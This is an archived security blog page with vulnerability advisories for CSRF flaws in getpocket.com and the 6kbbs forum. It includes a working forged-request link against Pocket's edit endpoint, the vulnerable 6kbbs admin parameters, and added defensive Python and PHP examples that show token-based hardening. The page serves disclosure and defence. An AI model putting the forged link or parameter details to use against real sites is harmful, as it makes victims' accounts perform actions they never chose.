<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-flaw</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/234603051201411475314523/">http://tetraph.blog.163.com/blog/static/234603051201411475314523/</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blogspot.com/2014/12/the-weather-channel-weathercom-almost.html">http://tetraph.blogspot.com/2014/12/the-weather-channel-xss.html</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://ithut.tumblr.com/post/121916595448/weather-channel-xss">http://ithut.tumblr.com/post/121916595448/weather-channel-xss</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-bug</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/12/the-weather-channel-weathercom-almost.html">http://computerobsess.blogspot.com/2014/12/the-weather-channel-xss.html</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-bug</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-60689996860586181572015-06-17T01:04:00.001-07:002015-06-17T01:05:35.322-07:00GetPocket getpocket.com CSRF (Cross-Site Request Forgery ) Web Security Vulnerability<div style="margin-bottom: 1.3em;">
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YKJkumXKUuk/VYEmlwr5u6I/AAAAAAAABEA/lA8DCglp-4M/s1600/pocket_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white;"><img border="0" height="253" src="http://4.bp.blogspot.com/-YKJkumXKUuk/VYEmlwr5u6I/AAAAAAAABEA/lA8DCglp-4M/s400/pocket_1.png" width="400" /></span></a></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span><span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span>
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">GetPocket getpocket.com CSRF (Cross-Site Request Forgery) Web Security Vulnerability</span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.2000007629395px;"><b>Domain: </b></span><span style="line-height: 19.2000007629395px;">getpocket.com</span></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.2000007629395px;">"Pocket was founded in 2007 by Nate Weiner to help people save interesting articles, videos and more from the web for later enjoyment. Once saved to Pocket, the list of content is visible on any device — phone, tablet or computer. It can be viewed while waiting in line, on the couch, during commutes or travel — even offline. </span><span style="line-height: 19.2000007629395px;">The world's leading save-for-later service currently has more than 17 million registered users and is integrated into more than 1500 apps including Flipboard, Twitter and Zite. It is available for major devices and platforms including iPad, iPhone, Android, Mac, Kindle Fire, Kobo, Google Chrome, Safari, Firefox, Opera and Windows." (From: https://getpocket.com/about)</span></span></div>
</div>
<div style="line-height: 28px;">
<span style="line-height: 21px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="line-height: 21px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="line-height: 21px;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><b style="background-color: white;">Vulnerability Description:</b></span></span></div>
<div>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28px;"><span style="line-height: 19.6000003814697px; text-align: justify;">Pocket</span></span><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.6000003814697px;"> (getpocket.com) has a web application security flaw that attackers can exploit through CSRF attacks.</span></span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white; line-height: 19.6000003814697px;"><br /></span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white; line-height: 19.6000003814697px;">"Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application." (OWASP)</span></span></div>
<div style="line-height: 28px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 28px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 28px;">
<span style="text-align: justify;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Tests were performed on Microsoft IE 9 (9.0.8112.16421) on Windows 7, Mozilla Firefox (37.0.2) and Google Chromium 42.0.2311 (64-bit) on Ubuntu (14.04.2), and Apple Safari 6.1.6 on Mac OS X v10.9 Mavericks.</span></span></div>
<div style="line-height: 28px;">
<span style="text-align: justify;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="text-align: justify;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="text-align: justify;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 28px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerability Details:</span></b></div>
<div style="line-height: 28px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><span style="line-height: 21px;">The flaw exists at the "https://getpocket.com/edit/edit" page, i.e. </span><span style="line-height: 25.2000007629395px;">https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=</span></span></div>
</div>
<div style="margin-bottom: 1.3em;">
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;">Vulnerable URL:</span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;">https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=</span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small; line-height: 28px;">The following test uses a website I created, "</span><span style="line-height: 28px;"><a href="http://itinfotech.tumblr.com/">http://itinfotech.tumblr.com/</a></span><span style="line-height: 28px;">". Suppose that this website is malicious. If it contains the following link, attackers can post any message they like.</span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><a href="https://getpocket.com/edit?url=http%3A%2F%2Fmake.wordpress.org%2Fcore%2F2014%2F01%2F15%2Fgit-mirrors-for-wordpress&title=csrf test">getpocket csrf test</a> [1]</span></div>
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">When a logged-in victim clicks the link ([1]), a new item is saved to his/her "Pocket" without his/her knowledge, and the attack succeeds.</span></span></div>
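<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">The root cause described above is a state-changing request that is accepted on GET with only the session cookie as proof of intent. The following is an added example, not code from the original advisory or from Pocket: a constructed model of such a save endpoint next to a hardened version. The origin, session values, handler names and token scheme are all assumptions made for illustration.</span></div>

```python
"""Constructed model of a save-for-later endpoint: CSRF-prone vs hardened."""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# All names below are hypothetical; this is not Pocket's code.
SERVER_KEY = secrets.token_bytes(32)      # secret used to derive CSRF tokens
SITE_ORIGIN = "https://reader.example"    # the application's own origin
SESSIONS = {"sess-alice": "alice"}        # constructed session cookie -> user


class Store:
    """In-memory stand-in for each user's saved-items list."""

    def __init__(self):
        self.items = {}

    def save(self, user, url, title):
        self.items.setdefault(user, []).append((url, title))


def csrf_token(session_id):
    """Token bound to one session: HMAC-SHA256(server key, session id)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_vulnerable(store, method, target, cookies, headers, form=None):
    """'Before': the session cookie alone authorizes a state change, even on GET.

    Assumes the browser attaches the cookie to cross-site requests
    (no SameSite restriction), so a link on any other site is enough.
    """
    user = SESSIONS.get(cookies.get("session"))
    if user is None:
        return 401
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    store.save(user, query.get("url", [""])[0], query.get("title", [""])[0])
    return 200


def handle_hardened(store, method, target, cookies, headers, form=None):
    """'After': POST only, a same-origin check, and a session-bound token."""
    session_id = cookies.get("session")
    user = SESSIONS.get(session_id)
    if user is None:
        return 401
    if method != "POST":                  # GET must never change state
        return 405
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403                        # request was issued by another site
    supplied = (form or {}).get("csrf_token", "")
    expected = csrf_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403                        # a forging page cannot know the token
    store.save(user, form.get("url", ""), form.get("title", ""))
    return 200


def demo():
    """Replay a forged cross-site link and a legitimate form post (constructed)."""
    cookies = {"session": "sess-alice"}   # sent automatically by the browser
    forged = "/edit?url=http%3A%2F%2Fother.example%2Fpage&title=csrf%20test"
    cross_site = {"Referer": "http://other.example/"}

    weak, strong = Store(), Store()
    results = {
        "vulnerable_forged_get": handle_vulnerable(weak, "GET", forged, cookies, cross_site),
        "hardened_forged_get": handle_hardened(strong, "GET", forged, cookies, cross_site),
        "hardened_forged_post": handle_hardened(
            strong, "POST", "/edit", cookies, {"Origin": "http://other.example"},
            {"url": "http://other.example/page", "title": "csrf test"}),
        "hardened_legit_post": handle_hardened(
            strong, "POST", "/edit", cookies, {"Origin": SITE_ORIGIN},
            {"url": "https://example.org/a", "title": "kept",
             "csrf_token": csrf_token("sess-alice")}),
    }
    return results, weak.items, strong.items


if __name__ == "__main__":
    print(demo())
```

<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">In a deployment, the token is rendered into the site's own forms, and setting the SameSite attribute on the session cookie adds a second layer.</span></div>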
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; margin-bottom: 1.3em;">
<div style="line-height: 25.2000007629395px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><span style="line-height: 25.2000007629395px;"><span style="line-height: 25.2000007629395px;"><b>PoC Video:</b></span></span> <a data-mce-href="http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be" href="http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be" rel="nofollow" style="line-height: 25.2000007629395px;">http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be</a></span></div>
<div style="line-height: 25.2000007629395px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 25.2000007629395px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="margin-bottom: 1.3em;">
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Blog Detail:</b></span></div>
<div>
<a href="https://webtechwire.wordpress.com/2014/04/29/getpocket-csrf/" style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://webtechwire.wordpress.com/2014/04/29/getpocket-csrf/</a></div>
<div>
<a href="http://www.tetraph.com/blog/csrf-vulnerability/getpocket-csrf-vulnerability/" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 28px;">http://www.tetraph.com/blog/csrf-vulnerability/getpocket-csrf-vulnerability/</a></div>
<div>
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="http://computerobsess.blogspot.com/2014/10/getpocket-csrf-vulnerability.html" style="background-color: white;">http://computerobsess.blogspot.com/2014/10/getpocket-csrf-vulnerability.html</a></span></div>
<div>
<a href="http://tetraph.blog.163.com/blog/static/23460305120143201422975/"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/23460305120143201422975/</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 28px;"><br /></span>
<div style="line-height: 25.2000007629395px;">
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Discoverer and Reporter:</span></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.6000003814697px;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.</span><span style="font-size: small; line-height: 28px;"> (<a href="https://twitter.com/justqdjing/status/558921275054096384">@justqdjing</a>)</span></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="-webkit-transition: color 0.3s; line-height: 28px; outline: none; transition: color 0.3s;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">http://www.tetraph.com/<wbr></wbr>wangjing</span></a></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-43901146032058268552015-06-14T02:11:00.000-07:002015-06-14T02:11:21.789-07:00CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-RSoLxo0R5C0/VX1CW1WDnsI/AAAAAAAAATw/ojMON-8jct8/s1600/6kbbs_4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://1.bp.blogspot.com/-RSoLxo0R5C0/VX1CW1WDnsI/AAAAAAAAATw/ojMON-8jct8/s400/6kbbs_4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;">CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: 6kbbs Multiple CSRF (Cross-Site Request Forgery) Security Vulnerabilities</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: 6kbbs</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Product: 6kbbs</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: v7.1 v8.0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: v7.1 v8.0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: April 02, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: April 02, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CXSecurity Reference: WLB-2015040034 </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 6.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:P)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 6.4</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Writer and Reporter: <span style="background-color: white; line-height: 18.2000007629395px;">Jing
Wang, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (</span><a href="https://twitter.com/justqdjing/status/583550839408627712">@justqdjing</a><span style="background-color: white; line-height: 18.2000007629395px;">)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Suggestion Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Versions:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">v7.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">v8.0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & download:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs can be obtained from here:</span><br />
<a href="http://www.6kbbs.com/download.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.6kbbs.com/download.html</span></a><br />
<a href="http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">"6kbbs
V8.0 is a PHP + MySQL built using high-performance forum, has the code
simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast,
small; Interface generous and good scalability; functional and practical
pursuing superior performance, good interface, the user's preferred
utility functions."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">"1,
using XHTML + CSS architecture, so that the structure of the page,
saving transmission static page code, but also easy to modify the
interface, more in line with WEB standards; 2, the Forum adopted
Cookies, Session, Application and other technical data cache on the
forum, reducing access to the database to improve the performance of the
Forum. Can carry more users simultaneously access; 3, the data points
table function, reduce the burden on the amount of data when accessing
the database; 4, support for multi-skin style switching function; 5, the
use of RSS technology to support subscriptions forum posts, recent
posts, user's posts; 6, the display frame mode + tablet mode, the user
can choose according to their own preferences to; 7. forum page
optimization keyword search, so the forum more easily indexed by search
engines; 8, extension, for our friends to provide a forum for a broad
expansion of space services; 9, webmasters can add different top and
bottom of the ad, depending on the layout; 10, post using HTML + UBB way
the two editors, mutual conversion, compatible with each other; ..."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The 6kbbs
web application has a security flaw that can be exploited through CSRF
(Cross-Site Request Forgery) attacks. An attacker may trick the victim
into clicking on an image, taking advantage of the trust relationship
between the authenticated victim and the application. Such an attack
could trick the victim into creating files that may then be called via a
separate CSRF attack or possibly other means, and executed in the
context of their session with the application, without further prompting
or verification.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Several
0-day vulnerabilities in 6kbbs products have previously been found by
other researchers, and 6kbbs has patched some of them. The Open Sourced
Vulnerability Database (OSVDB) is an independent, open-source
database. The goal of the project is to provide accurate, detailed,
current, and unbiased technical information on security vulnerabilities.
The project promotes greater, open collaboration between companies and
individuals. It has published suggestions, advisories, and solution
details related to CSRF vulnerabilities.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The
first programming flaw occurs at the "/portalchannel_ajax.php?" page,
with the "&id" and "&code" parameters in HTTP $POST.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2) </b>The second programming flaw occurs at the "/admin.php?" page, with the "&fileids" parameter in HTTP $POST.</span><br />
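<span style="font-family: Arial, Helvetica, sans-serif;">A state-changing POST handler like the ones listed in (2.1) and (2.2) resists forged cross-site requests once it requires a per-session token that another site cannot read. The PHP below is an added example, not 6kbbs code: the handler, the session keys and the "csrf_token" field are hypothetical, and only the "fileids" parameter name comes from the advisory.</span><br />

```php
<?php
declare(strict_types=1);

// Added example, not 6kbbs code. Handler name, session layout and the
// "csrf_token" field are hypothetical; "fileids" is the advisory's parameter.

/** Create the anti-CSRF token once per session and return it. */
function csrf_issue_token(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 64 hex chars
    }
    return $session['csrf_token'];
}

/** Compare the submitted token with the session's token in constant time. */
function csrf_is_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && $expected !== ''
        && is_string($supplied)
        && hash_equals($expected, $supplied);
}

/** Hypothetical admin action. Returns [HTTP status, message]. */
function handle_admin_file_action(array &$session, string $method, array $post): array
{
    if (empty($session['is_admin'])) {
        return [401, 'login required'];
    }
    // The session cookie is sent automatically, so it proves nothing about
    // which site built the request. Require POST plus the secret token.
    if ($method !== 'POST') {
        return [405, 'state-changing actions accept POST only'];
    }
    if (!csrf_is_valid($session, $post)) {
        return [403, 'missing or invalid CSRF token'];
    }
    // Validate the parameter itself: a non-empty list of numeric ids.
    $ids = $post['fileids'] ?? [];
    if (!is_array($ids) || $ids === []) {
        return [400, 'fileids must be a non-empty list'];
    }
    foreach ($ids as $id) {
        if (!is_string($id) || !ctype_digit($id)) {
            return [400, 'fileids must contain only numeric ids'];
        }
    }
    return [200, 'would process ' . count($ids) . ' file id(s)'];
}

// --- Constructed requests; run from the command line with the php CLI ---
$session = ['is_admin' => true];        // an authenticated admin session
$token   = csrf_issue_token($session);  // value embedded in the genuine form

$requests = [
    'cross-site form, no token'  => ['POST', ['fileids' => ['3', '7']]],
    'cross-site form, bad token' => ['POST', ['fileids' => ['3'],
                                              'csrf_token' => str_repeat('0', 64)]],
    'image or link request'      => ['GET',  []],
    'genuine admin form'         => ['POST', ['fileids' => ['3', '7'],
                                              'csrf_token' => $token]],
];
foreach ($requests as $label => [$method, $post]) {
    [$status, $message] = handle_admin_file_action($session, $method, $post);
    printf("%-28s -> %d %s\n", $label, $status, $message);
}
```

<span style="font-family: Arial, Helvetica, sans-serif;">Only the last request carries the session's token, so it is the only one that passes the check.</span><br />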
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Related Articles:</span></b><br />
<a href="http://cxsecurity.com/issue/WLB-2015040034"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://cxsecurity.com/issue/WLB-2015040034</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/04/05/7"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/04/05/7</span></a><br />
<a href="http://www.intelligentexploit.com/view-details.html?id=21071"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.intelligentexploit.com/view-details.html?id=21071</span></a><br />
